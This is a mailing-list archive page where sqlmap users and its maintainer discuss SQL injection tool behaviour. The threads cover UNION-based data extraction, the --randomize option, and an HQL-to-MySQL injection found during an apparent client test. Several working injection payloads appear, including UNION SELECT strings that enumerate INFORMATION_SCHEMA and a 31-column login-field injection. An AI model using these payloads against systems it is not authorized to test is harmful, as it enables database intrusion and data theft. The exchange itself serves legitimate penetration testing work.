Looking at some later requests, it appears that dumping a row from a table is performed this way (each column is concated together). So it looks like this kind of strategy is just not used consistently when limited to a single row. However, it could still chunk multiple rows into a single concat statement (selecting 10 rows per request for instance, instead just one). Just thoughts. > On Aug 15, 2017, at 4:04 PM, Brandon Perry <bpe...@gm...> wrote: > > Currently, it seems that sqlmap will use a payload such as the following is a UNIONable parameter is found that can only return one row in order for data to be exfil’ed. > > -16301 UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x71787a7871,IFNULL(CAST(schema_name AS CHAR),0x20),0x716a706271) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL > > When enumerating databases in an injection like this, sqlmap will make a single request per db name (note the LIMIT clause). This is a bit inefficient. I understand there may be length limitations to query string parameters, but I’m curious why sqlmap wouldn’t use a more efficient payload, such as the following. > > -16301 UNION ALL SELECT NULL,NULL,CONCAT(0x41414141, (SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1), 0x41414141,(SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1), 0x41414141,(SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL > > Error-based payloads certainly have length limitations in the data they can get out per request, but is there something preventing sqlmap from implementing a more efficient single-row UNION strategy when exfiltrating data? > > Let me know if this doesn’t make sense. |
From: Brandon P. <bpe...@gm...> - 2017-08-15 21:04:46
|
Currently, it seems that sqlmap will use a payload such as the following is a UNIONable parameter is found that can only return one row in order for data to be exfil’ed. -16301 UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x71787a7871,IFNULL(CAST(schema_name AS CHAR),0x20),0x716a706271) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL When enumerating databases in an injection like this, sqlmap will make a single request per db name (note the LIMIT clause). This is a bit inefficient. I understand there may be length limitations to query string parameters, but I’m curious why sqlmap wouldn’t use a more efficient payload, such as the following. -16301 UNION ALL SELECT NULL,NULL,CONCAT(0x41414141, (SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1), 0x41414141,(SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1), 0x41414141,(SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL Error-based payloads certainly have length limitations in the data they can get out per request, but is there something preventing sqlmap from implementing a more efficient single-row UNION strategy when exfiltrating data? Let me know if this doesn’t make sense. |
From: OBADARE O. <oba...@gm...> - 2017-04-20 10:50:15
|
Hi, Am trying to fetch a database name through sql injection but keep getting a gibberish name/information. Has anyone encountered this kind of problem and if yes, how did you resolved it. Kindly find below the screenshot. |
From: Miroslav S. <mir...@gm...> - 2017-02-28 12:18:01
|
p.s. with the latest commit I've (at least) prevented that the last value is the same as the following "randomized" (e..g. original 1 -> random 1 <- because, this one is chosen as randint(1,9) and there was a chance that it will get the original value) On Tue, Feb 28, 2017 at 1:12 PM, Miroslav Stampar < mir...@gm...> wrote: > Hi. > > It goes like this. Parameter is randomized, BUT, the parameter value holds > the original form. This means that if your parameter is single digit, the > following request will be a random value chosen from the [0-9]. This > basically means that there is a chance that the following "random" value > could be the same as the last one AND that you'll soon be left without any > new values (after avg. 8-9 requests). > > Hence, use some larger "original" value for that same parameter you want > to randomize :) > > Bye > > On Tue, Feb 28, 2017 at 12:32 AM, Brandon Perry <bpe...@gm... > > wrote: > >> >> > On Feb 27, 2017, at 4:28 PM, Brandon Perry <bpe...@gm...> >> wrote: >> > >> > Hi, testing —randomize for the first time. >> > >> > I have an injection that is certainly boolean-injectable as I can >> exploit by hand, but the content of the response can change if the url >> requested seems to have been hit before. >> > >> > For instance, if I do GET /fdsa/1%20or%201=1, 100 bytes are returned. >> If I do it again, I get 150 bytes back from now on. >> > >> > If I append a garbage HTTP parameter and randomize the value in the >> parameter, I always get 100 bytes back. >> > >> > It’s a weird injection, but sqlmap seems to think that the page >> contents is changing during warm-up, even if I append a garbage parameter >> and tell —randomize to randomize it. >> > >> > [16:20:14] [WARNING] target URL is not stable. sqlmap will base the >> page comparison on a sequence matcher. If no dynamic nor injectable >> parameters are detected, or in case of junk results, refer to user's manual >> paragraph 'Page comparison' and provide a string or regular expression to >> match on >> > >> > I have verified by hand that changing the HTTP parameter value each >> request results in the same data from the injection being returned from the >> server. It seems —randomize isn’t being respected in the very beginning. >> > >> > Any thoughts? Hopefully this makes sense. >> >> Doing testing through burp suite, I see that the HTTP parameter is indeed >> randomized, so I am not sure what’s up yet. >> >> >> ------------------------------------------------------------ >> ------------------ >> Check out the vibrant tech community on one of the world's most >> engaging tech sites, SlashDot.org! http://sdm.link/slashdot >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2017-02-28 12:12:54
|
Hi. It goes like this. Parameter is randomized, BUT, the parameter value holds the original form. This means that if your parameter is single digit, the following request will be a random value chosen from the [0-9]. This basically means that there is a chance that the following "random" value could be the same as the last one AND that you'll soon be left without any new values (after avg. 8-9 requests). Hence, use some larger "original" value for that same parameter you want to randomize :) Bye On Tue, Feb 28, 2017 at 12:32 AM, Brandon Perry <bpe...@gm...> wrote: > > > On Feb 27, 2017, at 4:28 PM, Brandon Perry <bpe...@gm...> > wrote: > > > > Hi, testing —randomize for the first time. > > > > I have an injection that is certainly boolean-injectable as I can > exploit by hand, but the content of the response can change if the url > requested seems to have been hit before. > > > > For instance, if I do GET /fdsa/1%20or%201=1, 100 bytes are returned. If > I do it again, I get 150 bytes back from now on. > > > > If I append a garbage HTTP parameter and randomize the value in the > parameter, I always get 100 bytes back. > > > > It’s a weird injection, but sqlmap seems to think that the page contents > is changing during warm-up, even if I append a garbage parameter and tell > —randomize to randomize it. > > > > [16:20:14] [WARNING] target URL is not stable. sqlmap will base the page > comparison on a sequence matcher. If no dynamic nor injectable parameters > are detected, or in case of junk results, refer to user's manual paragraph > 'Page comparison' and provide a string or regular expression to match on > > > > I have verified by hand that changing the HTTP parameter value each > request results in the same data from the injection being returned from the > server. It seems —randomize isn’t being respected in the very beginning. > > > > Any thoughts? Hopefully this makes sense. > > Doing testing through burp suite, I see that the HTTP parameter is indeed > randomized, so I am not sure what’s up yet. > > > ------------------------------------------------------------ > ------------------ > Check out the vibrant tech community on one of the world's most > engaging tech sites, SlashDot.org! http://sdm.link/slashdot > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
From: Brandon P. <bpe...@gm...> - 2017-02-27 23:32:26
|
> On Feb 27, 2017, at 4:28 PM, Brandon Perry <bpe...@gm...> wrote: > > Hi, testing —randomize for the first time. > > I have an injection that is certainly boolean-injectable as I can exploit by hand, but the content of the response can change if the url requested seems to have been hit before. > > For instance, if I do GET /fdsa/1%20or%201=1, 100 bytes are returned. If I do it again, I get 150 bytes back from now on. > > If I append a garbage HTTP parameter and randomize the value in the parameter, I always get 100 bytes back. > > It’s a weird injection, but sqlmap seems to think that the page contents is changing during warm-up, even if I append a garbage parameter and tell —randomize to randomize it. > > [16:20:14] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on > > I have verified by hand that changing the HTTP parameter value each request results in the same data from the injection being returned from the server. It seems —randomize isn’t being respected in the very beginning. > > Any thoughts? Hopefully this makes sense. Doing testing through burp suite, I see that the HTTP parameter is indeed randomized, so I am not sure what’s up yet. |
From: Brandon P. <bpe...@gm...> - 2017-02-27 22:28:55
|
Hi, testing —randomize for the first time. I have an injection that is certainly boolean-injectable as I can exploit by hand, but the content of the response can change if the url requested seems to have been hit before. For instance, if I do GET /fdsa/1%20or%201=1, 100 bytes are returned. If I do it again, I get 150 bytes back from now on. If I append a garbage HTTP parameter and randomize the value in the parameter, I always get 100 bytes back. It’s a weird injection, but sqlmap seems to think that the page contents is changing during warm-up, even if I append a garbage parameter and tell —randomize to randomize it. [16:20:14] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on I have verified by hand that changing the HTTP parameter value each request results in the same data from the injection being returned from the server. It seems —randomize isn’t being respected in the very beginning. Any thoughts? Hopefully this makes sense. |
From: Robin W. <ro...@di...> - 2017-02-25 07:46:22
|
Thanks, I'll give it a go specifying the number of columns when I'm next allowed to test. It might also cause problems that a couple of the columns have to be dates so might have to resort to scripting it by hand. Robin On Sat, 25 Feb 2017, 07:34 Miroslav Stampar, <mir...@gm...> wrote: > p.s. you have a very specific case. I had a couple of similar and had to > make my own script(s). Basically, data is provided to two separate DBMSes, > while you are targeting the second one. To get to it you have to make a > payload that won't make problems with the first one. In your case I would > try to provide only valid options to sqlmap (e.g. --data > "...?logname=admin" --technique=U --union-cols=31 --dbms=mysql) and cross > the fingers. If that fails you'll have to make a case specific script. For > MySQL enumeration queries you can always take a look into xml/payloads.xml > > On Sat, Feb 25, 2017 at 8:17 AM, Miroslav Stampar < > mir...@gm...> wrote: > > "Do you know the maximum number of fields the union will do" - by default > 1-10. If there are more techniques usable (e.g. boolean), it will extend > it. Also, if ORDER BY is usable it will try to find the number of columns > without limitations. If you want to manually extend, use --union-cols (e.g. > 1-100) > > Bye > > On Sat, Feb 25, 2017 at 12:28 AM, Robin Wood <ro...@di...nja> wrote: > > Annoyingly my test window is closed and I'll probably not get to talk to > the client will Monday but will try this out on a test box just to watch > the traffic and see if it is doing what I think should work. > > Ta > > Robin > > On Fri, 24 Feb 2017, 23:23 Chris Oakley, <chr...@gm...> > wrote: > > I *think* (going from memory here) that it's higher than that by default. > There's also the --union-cols=30-40, so you should be good > > On 24 February 2017 at 18:17, Robin Wood <ro...@di...nja> wrote: > > I hadn't tried the custom injection point, I'll give that a try. Do you > know the maximum number of fields the union will do, was thinking about it > after shutting machine down and think it's 30 so will need to increase that. > > Robin > > On Fri, 24 Feb 2017, 23:14 Chris Oakley, <chr...@gm...> > wrote: > > I assume you've tried * for custom injection point and --technique=U? > > Whether or not it'll dance with HQL is another question entirely. > > On 24 February 2017 at 16:44, Robin Wood <ro...@di...nja> wrote: > > I've just found an instance of Hibernate Query Language injection that > lets me get at an underlying MySQL database if I inject in the right way, > some examples I've got are: > > loginName=a - works and gives 200 > loginName=' - fails with HQL error and 500 > loginName=a' or 'a'='a - works and gives 200 > loginName=a\'' - gets through HQL and then generates a MySQL error in a > where clause. The injection gets converted to where NAME='a\''' > > With some playing I've found that this is a valid injection and they are > running as root as I get a 500 back when I supply root, a 200 when give > something else. > > loginName=a' and 'a\''="a" union select > @@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01" > from users where user()="root@localhost" -- '='1 > > The 500 is because some of the stuff from the union isn't being handled > correctly by the page, the 200 is because the union doesn't return any data > so the first bit (basically a=a) is returning valid data so getting through > the rest of the parsing. > > So I think what I need to do is to tell SQLMap that it is a union > injection with 31 fields and that the injection needs to go into here: > > loginName=a' and 'a\''="a" <INJECT> -- '='1 > > Can I do this? > > I've got all this set up and running in Burp so I can test things out if > anyone needs me to. > > Robin > > > ------------------------------------------------------------------------------ > Check out the vibrant tech community on one of the world's most > engaging tech sites, SlashDot.org! http://sdm.link/slashdot > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > ------------------------------------------------------------------------------ > Check out the vibrant tech community on one of the world's most > engaging tech sites, SlashDot.org! http://sdm.link/slashdot > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > > > -- > Miroslav Stampar > http://about.me/stamparm > |
From: Miroslav S. <mir...@gm...> - 2017-02-25 07:34:20
|
p.s. you have a very specific case. I had a couple of similar and had to make my own script(s). Basically, data is provided to two separate DBMSes, while you are targeting the second one. To get to it you have to make a payload that won't make problems with the first one. In your case I would try to provide only valid options to sqlmap (e.g. --data "...?logname=admin" --technique=U --union-cols=31 --dbms=mysql) and cross the fingers. If that fails you'll have to make a case specific script. For MySQL enumeration queries you can always take a look into xml/payloads.xml On Sat, Feb 25, 2017 at 8:17 AM, Miroslav Stampar < mir...@gm...> wrote: > "Do you know the maximum number of fields the union will do" - by default > 1-10. If there are more techniques usable (e.g. boolean), it will extend > it. Also, if ORDER BY is usable it will try to find the number of columns > without limitations. If you want to manually extend, use --union-cols (e.g. > 1-100) > > Bye > > On Sat, Feb 25, 2017 at 12:28 AM, Robin Wood <ro...@di...nja> wrote: > >> Annoyingly my test window is closed and I'll probably not get to talk to >> the client will Monday but will try this out on a test box just to watch >> the traffic and see if it is doing what I think should work. >> >> Ta >> >> Robin >> >> On Fri, 24 Feb 2017, 23:23 Chris Oakley, <chr...@gm...> >> wrote: >> >>> I *think* (going from memory here) that it's higher than that by >>> default. There's also the --union-cols=30-40, so you should be good >>> >>> On 24 February 2017 at 18:17, Robin Wood <ro...@di...nja> wrote: >>> >>> I hadn't tried the custom injection point, I'll give that a try. Do you >>> know the maximum number of fields the union will do, was thinking about it >>> after shutting machine down and think it's 30 so will need to increase that. >>> >>> Robin >>> >>> On Fri, 24 Feb 2017, 23:14 Chris Oakley, <chr...@gm...> >>> wrote: >>> >>> I assume you've tried * for custom injection point and --technique=U? >>> >>> Whether or not it'll dance with HQL is another question entirely. >>> >>> On 24 February 2017 at 16:44, Robin Wood <ro...@di...nja> wrote: >>> >>> I've just found an instance of Hibernate Query Language injection that >>> lets me get at an underlying MySQL database if I inject in the right way, >>> some examples I've got are: >>> >>> loginName=a - works and gives 200 >>> loginName=' - fails with HQL error and 500 >>> loginName=a' or 'a'='a - works and gives 200 >>> loginName=a\'' - gets through HQL and then generates a MySQL error in a >>> where clause. The injection gets converted to where NAME='a\''' >>> >>> With some playing I've found that this is a valid injection and they are >>> running as root as I get a 500 back when I supply root, a 200 when give >>> something else. >>> >>> loginName=a' and 'a\''="a" union select @@version,2,3,4,5,6,7,8,9,10,1 >>> 1,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01" >>> from users where user()="root@localhost" -- '='1 >>> >>> The 500 is because some of the stuff from the union isn't being handled >>> correctly by the page, the 200 is because the union doesn't return any data >>> so the first bit (basically a=a) is returning valid data so getting through >>> the rest of the parsing. >>> >>> So I think what I need to do is to tell SQLMap that it is a union >>> injection with 31 fields and that the injection needs to go into here: >>> >>> loginName=a' and 'a\''="a" <INJECT> -- '='1 >>> >>> Can I do this? >>> >>> I've got all this set up and running in Burp so I can test things out if >>> anyone needs me to. >>> >>> Robin >>> >>> ------------------------------------------------------------ >>> ------------------ >>> Check out the vibrant tech community on one of the world's most >>> engaging tech sites, SlashDot.org! http://sdm.link/slashdot >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >>> >>> >> ------------------------------------------------------------ >> ------------------ >> Check out the vibrant tech community on one of the world's most >> engaging tech sites, SlashDot.org! http://sdm.link/slashdot >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2017-02-25 07:17:39
|
"Do you know the maximum number of fields the union will do" - by default 1-10. If there are more techniques usable (e.g. boolean), it will extend it. Also, if ORDER BY is usable it will try to find the number of columns without limitations. If you want to manually extend, use --union-cols (e.g. 1-100) Bye On Sat, Feb 25, 2017 at 12:28 AM, Robin Wood <ro...@di...nja> wrote: > Annoyingly my test window is closed and I'll probably not get to talk to > the client will Monday but will try this out on a test box just to watch > the traffic and see if it is doing what I think should work. > > Ta > > Robin > > On Fri, 24 Feb 2017, 23:23 Chris Oakley, <chr...@gm...> > wrote: > >> I *think* (going from memory here) that it's higher than that by >> default. There's also the --union-cols=30-40, so you should be good >> >> On 24 February 2017 at 18:17, Robin Wood <ro...@di...nja> wrote: >> >> I hadn't tried the custom injection point, I'll give that a try. Do you >> know the maximum number of fields the union will do, was thinking about it >> after shutting machine down and think it's 30 so will need to increase that. >> >> Robin >> >> On Fri, 24 Feb 2017, 23:14 Chris Oakley, <chr...@gm...> >> wrote: >> >> I assume you've tried * for custom injection point and --technique=U? >> >> Whether or not it'll dance with HQL is another question entirely. >> >> On 24 February 2017 at 16:44, Robin Wood <ro...@di...nja> wrote: >> >> I've just found an instance of Hibernate Query Language injection that >> lets me get at an underlying MySQL database if I inject in the right way, >> some examples I've got are: >> >> loginName=a - works and gives 200 >> loginName=' - fails with HQL error and 500 >> loginName=a' or 'a'='a - works and gives 200 >> loginName=a\'' - gets through HQL and then generates a MySQL error in a >> where clause. The injection gets converted to where NAME='a\''' >> >> With some playing I've found that this is a valid injection and they are >> running as root as I get a 500 back when I supply root, a 200 when give >> something else. >> >> loginName=a' and 'a\''="a" union select @@version,2,3,4,5,6,7,8,9,10, >> 11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01" >> from users where user()="root@localhost" -- '='1 >> >> The 500 is because some of the stuff from the union isn't being handled >> correctly by the page, the 200 is because the union doesn't return any data >> so the first bit (basically a=a) is returning valid data so getting through >> the rest of the parsing. >> >> So I think what I need to do is to tell SQLMap that it is a union >> injection with 31 fields and that the injection needs to go into here: >> >> loginName=a' and 'a\''="a" <INJECT> -- '='1 >> >> Can I do this? >> >> I've got all this set up and running in Burp so I can test things out if >> anyone needs me to. >> >> Robin >> >> ------------------------------------------------------------ >> ------------------ >> Check out the vibrant tech community on one of the world's most >> engaging tech sites, SlashDot.org! http://sdm.link/slashdot >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> >> >> > ------------------------------------------------------------ > ------------------ > Check out the vibrant tech community on one of the world's most > engaging tech sites, SlashDot.org! http://sdm.link/slashdot > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
From: Robin W. <ro...@di...> - 2017-02-24 23:28:27
|
Annoyingly my test window is closed and I'll probably not get to talk to the client will Monday but will try this out on a test box just to watch the traffic and see if it is doing what I think should work. Ta Robin On Fri, 24 Feb 2017, 23:23 Chris Oakley, <chr...@gm...> wrote: > I *think* (going from memory here) that it's higher than that by default. > There's also the --union-cols=30-40, so you should be good > > On 24 February 2017 at 18:17, Robin Wood <ro...@di...nja> wrote: > > I hadn't tried the custom injection point, I'll give that a try. Do you > know the maximum number of fields the union will do, was thinking about it > after shutting machine down and think it's 30 so will need to increase that. > > Robin > > On Fri, 24 Feb 2017, 23:14 Chris Oakley, <chr...@gm...> > wrote: > > I assume you've tried * for custom injection point and --technique=U? > > Whether or not it'll dance with HQL is another question entirely. > > On 24 February 2017 at 16:44, Robin Wood <ro...@di...nja> wrote: > > I've just found an instance of Hibernate Query Language injection that > lets me get at an underlying MySQL database if I inject in the right way, > some examples I've got are: > > loginName=a - works and gives 200 > loginName=' - fails with HQL error and 500 > loginName=a' or 'a'='a - works and gives 200 > loginName=a\'' - gets through HQL and then generates a MySQL error in a > where clause. The injection gets converted to where NAME='a\''' > > With some playing I've found that this is a valid injection and they are > running as root as I get a 500 back when I supply root, a 200 when give > something else. > > loginName=a' and 'a\''="a" union select > @@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01" > from users where user()="root@localhost" -- '='1 > > The 500 is because some of the stuff from the union isn't being handled > correctly by the page, the 200 is because the union doesn't return any data > so the first bit (basically a=a) is returning valid data so getting through > the rest of the parsing. > > So I think what I need to do is to tell SQLMap that it is a union > injection with 31 fields and that the injection needs to go into here: > > loginName=a' and 'a\''="a" <INJECT> -- '='1 > > Can I do this? > > I've got all this set up and running in Burp so I can test things out if > anyone needs me to. > > Robin > > > ------------------------------------------------------------------------------ > Check out the vibrant tech community on one of the world's most > engaging tech sites, SlashDot.org! http://sdm.link/slashdot > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > |
From: Chris O. <chr...@gm...> - 2017-02-24 23:23:40
|
I *think* (going from memory here) that it's higher than that by default. There's also the --union-cols=30-40, so you should be good On 24 February 2017 at 18:17, Robin Wood <ro...@di...nja> wrote: > I hadn't tried the custom injection point, I'll give that a try. Do you > know the maximum number of fields the union will do, was thinking about it > after shutting machine down and think it's 30 so will need to increase that. > > Robin > > On Fri, 24 Feb 2017, 23:14 Chris Oakley, <chr...@gm...> > wrote: > >> I assume you've tried * for custom injection point and --technique=U? >> >> Whether or not it'll dance with HQL is another question entirely. >> >> On 24 February 2017 at 16:44, Robin Wood <ro...@di...nja> wrote: >> >> I've just found an instance of Hibernate Query Language injection that >> lets me get at an underlying MySQL database if I inject in the right way, >> some examples I've got are: >> >> loginName=a - works and gives 200 >> loginName=' - fails with HQL error and 500 >> loginName=a' or 'a'='a - works and gives 200 >> loginName=a\'' - gets through HQL and then generates a MySQL error in a >> where clause. The injection gets converted to where NAME='a\''' >> >> With some playing I've found that this is a valid injection and they are >> running as root as I get a 500 back when I supply root, a 200 when give >> something else. >> >> loginName=a' and 'a\''="a" union select @@version,2,3,4,5,6,7,8,9,10, >> 11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01" >> from users where user()="root@localhost" -- '='1 >> >> The 500 is because some of the stuff from the union isn't being handled >> correctly by the page, the 200 is because the union doesn't return any data >> so the first bit (basically a=a) is returning valid data so getting through >> the rest of the parsing. >> >> So I think what I need to do is to tell SQLMap that it is a union >> injection with 31 fields and that the injection needs to go into here: >> >> loginName=a' and 'a\''="a" <INJECT> -- '='1 >> >> Can I do this? >> >> I've got all this set up and running in Burp so I can test things out if >> anyone needs me to. >> >> Robin >> >> ------------------------------------------------------------ >> ------------------ >> Check out the vibrant tech community on one of the world's most >> engaging tech sites, SlashDot.org! http://sdm.link/slashdot >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> >> |
From: Robin W. <ro...@di...> - 2017-02-24 23:18:12
|
I hadn't tried the custom injection point, I'll give that a try. Do you know the maximum number of fields the union will do, was thinking about it after shutting machine down and think it's 30 so will need to increase that. Robin On Fri, 24 Feb 2017, 23:14 Chris Oakley, <chr...@gm...> wrote: > I assume you've tried * for custom injection point and --technique=U? > > Whether or not it'll dance with HQL is another question entirely. > > On 24 February 2017 at 16:44, Robin Wood <ro...@di...nja> wrote: > > I've just found an instance of Hibernate Query Language injection that > lets me get at an underlying MySQL database if I inject in the right way, > some examples I've got are: > > loginName=a - works and gives 200 > loginName=' - fails with HQL error and 500 > loginName=a' or 'a'='a - works and gives 200 > loginName=a\'' - gets through HQL and then generates a MySQL error in a > where clause. The injection gets converted to where NAME='a\''' > > With some playing I've found that this is a valid injection and they are > running as root as I get a 500 back when I supply root, a 200 when give > something else. > > loginName=a' and 'a\''="a" union select > @@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01" > from users where user()="root@localhost" -- '='1 > > The 500 is because some of the stuff from the union isn't being handled > correctly by the page, the 200 is because the union doesn't return any data > so the first bit (basically a=a) is returning valid data so getting through > the rest of the parsing. > > So I think what I need to do is to tell SQLMap that it is a union > injection with 31 fields and that the injection needs to go into here: > > loginName=a' and 'a\''="a" <INJECT> -- '='1 > > Can I do this? > > I've got all this set up and running in Burp so I can test things out if > anyone needs me to. > > Robin > > > ------------------------------------------------------------------------------ > Check out the vibrant tech community on one of the world's most > engaging tech sites, SlashDot.org! http://sdm.link/slashdot > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > |